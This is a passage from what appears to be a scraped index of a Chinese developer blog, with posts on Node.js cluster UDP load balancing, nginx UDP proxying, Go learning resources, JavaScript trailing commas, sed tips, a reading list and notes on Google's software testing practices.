${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { logger.info(`udp server error:\\n${err.stack}`) server.close() }) server.on(\u0026#39;message\u0026#39;, (msg, rinfo) =\u0026gt; { logger.info(`${process.pid} udp server got: ${msg} from ${rinfo.address}:${rinfo.port}`) }) server.on(\u0026#39;listening\u0026#39;, () =\u0026gt; { const address = server.address() logger.info(`udp server listening ${address.address}:${address.port}`) }) server.bind(port) } 日志库如下:\nconst logger = require(\u0026#39;pino\u0026#39;)() module.exports = { logger } 启动服务之后,从日志中可以看到:启动了四个进程。\n{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194869,\u0026#34;pid\u0026#34;:98795,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194870,\u0026#34;pid\u0026#34;:98797,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194872,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194876,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} 然后我们使用nc的-u参数, 来向这个udp server发送消息\nnc -u 0.0.0.0 8088 ... 
然后观察server的日志发现:\n基本上所有的消息都被最后一个进程消费 pid 98798 消费一个消息 其他进程没有消费消息 {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601201509,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: adf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202172,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: asdflasdf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202382,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202545,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202678,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202832,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203332,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 
{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203420,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203500,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203609,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203669,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203752,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203836,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203920,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204004,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 
127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204089,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204172,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204256,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204340,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204423,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204507,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204590,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204674,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp 
server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204759,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204842,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204926,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205010,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205093,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 为什么会这样?看看cluster模块的代码 lib/cluster.js lib/cluster.js cluster除去注释,代码仅有两行 \u0026#39;use strict\u0026#39;; // 根据环境变量中是否有NODE_UNIQUE_ID来判断当前进程是主进程还是子进程 const childOrPrimary = \u0026#39;NODE_UNIQUE_ID\u0026#39; in process.env ? 
\u0026#39;child\u0026#39; : \u0026#39;primary\u0026#39;; // 根据进程类型不同,加载的文件也不同 // 对于主进程,则加载 internal/cluster/primary // 对于子进程,则加载 internal/cluster/child module.exports = require(`internal/cluster/${childOrPrimary}`); internal/cluster/primary.js 轮询策略的种类 通过阅读源码,我们可以获取到以下结论:\ncluster模块实际上是一个事件发射器 cluster模块有两种负载均衡方式 SCHED_NONE 由操作系统决定 SCHED_RR 轮询的方式 const { ArrayPrototypePush, ArrayPrototypeSlice, ArrayPrototypeSome, ObjectKeys, ObjectValues, RegExpPrototypeTest, SafeMap, StringPrototypeStartsWith, } = primordials; const assert = require(\u0026#39;internal/assert\u0026#39;); const { fork } = require(\u0026#39;child_process\u0026#39;); const path = require(\u0026#39;path\u0026#39;); const EventEmitter = require(\u0026#39;events\u0026#39;); const RoundRobinHandle = require(\u0026#39;internal/cluster/round_robin_handle\u0026#39;); const SharedHandle = require(\u0026#39;internal/cluster/shared_handle\u0026#39;); const Worker = require(\u0026#39;internal/cluster/worker\u0026#39;); const { internal, sendHelper } = require(\u0026#39;internal/cluster/utils\u0026#39;); const cluster = new EventEmitter(); const intercom = new EventEmitter(); const SCHED_NONE = 1; const SCHED_RR = 2; const minPort = 1024; const maxPort = 65535; const { validatePort } = require(\u0026#39;internal/validators\u0026#39;); module.exports = cluster; const handles = new SafeMap(); cluster.isWorker = false; cluster.isMaster = true; // Deprecated alias. Must be same as isPrimary. cluster.isPrimary = true; cluster.Worker = Worker; cluster.workers = {}; cluster.settings = {}; cluster.SCHED_NONE = SCHED_NONE; // Leave it to the operating system. cluster.SCHED_RR = SCHED_RR; // Primary distributes connections. 轮询策略如何选择 接下来,我们就要再看看,两种不同的负载策略是如何选择的?\n负载策略刚开始来自NODE_CLUSTER_SCHED_POLICY这个环境变量 这个环境变量有两个值 rr和none 但是如果系统平台是win32, 也就是windows的情况下,则不会使用轮询的负载方式 除此以外,默认将会使用轮询的负载方式 // XXX(bnoordhuis) Fold cluster.schedulingPolicy into cluster.settings? 
let schedulingPolicy = process.env.NODE_CLUSTER_SCHED_POLICY; if (schedulingPolicy === \u0026#39;rr\u0026#39;) schedulingPolicy = SCHED_RR; else if (schedulingPolicy === \u0026#39;none\u0026#39;) schedulingPolicy = SCHED_NONE; else if (process.platform === \u0026#39;win32\u0026#39;) { // Round-robin doesn\u0026#39;t perform well on // Windows due to the way IOCP is wired up. schedulingPolicy = SCHED_NONE; } else schedulingPolicy = SCHED_RR; cluster.schedulingPolicy = schedulingPolicy; 那么,为什么udp的多进程服务器,并没有做到轮询的负载呢?\n轮询策略的使用 即使调度策略是轮询的方式,如果socket是udp的,也不会用轮询的方式去处理,而用SharedHandle去处理 注释里面写,udp使用轮询的方式是无意义的,这点我不太理解 // UDP is exempt from round-robin connection balancing for what should // be obvious reasons: it\u0026#39;s connectionless. There is nothing to send to // the workers except raw datagrams and that\u0026#39;s pointless. if (schedulingPolicy !== SCHED_RR || message.addressType === \u0026#39;udp4\u0026#39; || message.addressType === \u0026#39;udp6\u0026#39;) { handle = new SharedHandle(key, address, message); } else { handle = new RoundRobinHandle(key, address, message); } ","permalink":"https://wdd.js.org/posts/2021/07/tniabf/","summary":"本来我的目的是使用cluster模块fork出多个进程,让各个进程都能处理udp消息。但是最终测试发现,实际上仅有一个进程处理了绝大多数消息,其他的进程,要么不处理消息,要么只处理非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.
《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","permalink":"https://wdd.js.org/golang/learn-material/","summary":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","title":"Golang学习资料"},{"content":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 
例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used. The number serves as a hint for session termination. By default, the number of datagrams is not limited. If zero value is specified, no response is expected. However, if a response is received and the session is still not finished, the response will be handled.\n我能用HAProxy吗? 答: HAProxy不支持udp Proxy,你不能用\nHAProxy is a free, very fast and reliable solution offering high availability, load balancing, and proxying for TCP and HTTP-based applications\n参考 http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_responses https://stackoverflow.com/questions/31255780/udp-traffic-with-iperf-for-haproxy ","permalink":"https://wdd.js.org/posts/2021/07/tom7mv/","summary":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 
例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used.","title":"使用nginx为udp服务负载均衡"},{"content":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许在一些场景下,在尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们在新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全面支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].length // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Trailing_commas ","permalink":"https://wdd.js.org/fe/js-trailing-commas/","summary":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, 
\u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许在一些场景下,在尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们在新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全面支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].length // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.","title":"Js Trailing Commas"},{"content":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","permalink":"https://wdd.js.org/posts/2021/07/ou9o92/","summary":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","title":"7月书单"},{"content":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转义/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. 
The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html\n# 可以用#来替代/ sed \u0026#39;s#ABC#de/#g\u0026#39; some.txt # 也可以用?来替代/ sed \u0026#39;s?ABC?de#?g\u0026#39; some.txt 替代的目标中包含变量 # 注意这里用的是双引号,内部的变量会被转义 sed \u0026#34;s#ABC#${TODAY}#g\u0026#34; some.txt 参考 https://www.gnu.org/software/sed/manual/sed.html ","permalink":"https://wdd.js.org/shell/sed-tips/","summary":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转义/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. 
https://www.gnu.org/software/sed/manual/sed.html","title":"sed替换"},{"content":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.1.3 项目的早期阶段 \u0026gt; 位置 908一个产品如果在概念上还没有完全确定成型时就去关心质量,这就是优先级混乱的表现。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1398每个测试和其他测试之间都是独立的,使它们就能够以任意顺序来执行。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1399测试不做任何数据持久化方面的工作。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1400在这些测试用例离开测试环境的时候,要保证测试环境的状态与测试用例开始执行之前的状态是一样的。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1404总之,“任意顺序”意味着可以并发执行用例。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1650在一些棘手的编码问题或功能的正确性上浪费时间,不如考核他们是如何看待编码和质量的。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1727测试不应是被要求了才去做的事情。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1728程序的稳定性和韧性比功能正确要重要的多。标注(黄色) - 2.4 与工具开发工程师Ted Mao的访谈 \u0026gt; 位置 1796要允许他们使用你无法预料的方式来使用你的工具。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1845我使用了一个被称为 DDD(译注: defect-driven development)的流程,缺陷驱动开发。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1859Chrome在使用 PyAuto,第3章 测试工程师标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1879我们说 TE是一种“用户开发者( user-developer)”,这不是一个容易理解的概念。标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1880对于编码的敬意是公司文化中相当重要的一点。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1903在研发的早期阶段,功能还在不断变化,最终功能列表和范畴还没有确定, TE通常没有太多的工作可做。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1904给一个项目配备多少测试人员,取决于项目风险和投资回报率。标注(黄色) - 3.2 测试工程师的工作 
